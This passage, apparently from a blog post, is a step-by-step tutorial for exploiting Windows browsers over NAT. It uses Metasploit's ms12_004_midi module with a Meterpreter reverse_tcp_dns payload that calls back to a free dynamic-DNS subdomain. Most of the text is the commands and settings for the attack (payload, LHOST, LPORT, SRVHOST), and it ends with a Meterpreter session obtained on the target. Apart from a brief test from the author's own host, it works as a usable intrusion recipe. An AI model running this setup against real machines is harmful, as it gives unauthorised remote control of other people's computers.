We overcome this obstacle by creating a free DNS subdomain and point it at our public IP. I used the site freedns.afraid.org. There are a number of domains to leverage.
**Important - In order to bind our listening address, create the payload, and enable to payload to connect back to our public IP address, we need to edit our '/etc/hosts' file.
Add the following line: (hostip is the internal IP Metasploit is listenting, subdomain.domain.com is the new DNS subdomain you created that points to your external IP):
hostip subdomain.domain.com
**Additionally, it is important that when Metasploit resolves the DNS hostname, it gets the internal IP address. This will allow it to bind locally. This is why we added the above entry to our '/etc/hosts' file.
Now that we've laid the foundation, we can move forward to setting up Metasploit. In this example, we use the 'ms12_004_midi' browser exploit module.
use exploit/windows/browser/ms12_004_midi
We will implement the Meterpreter 'reverse_tcp_dns' payload that will allow us to bind our DNS hostname within the payload - allowing it to call back to us. This is an important step.
set PAYLOAD windows/meterpreter/reverse_tcp_dns
Set our variables.
set SRVHOST 10.0.0.15
set URIPATH lamesauce
set LHOST subdomain.domain.com
set LPORT 4443
We are ready to start our server.
exploit
Now we test from our external Windows host. Visit the URL containing our new domain.
The vulnerability in the browser is exploited. In this case, the Media Player plugin has a vulnerability in the way it handles (or can't handle) a corrupted .midi file. We get our Meterpreter session.
The payload was able to call back to our listener using DNS. We now have two way connection, a Meterpreter session. All done over NAT.
No comments:
Post a Comment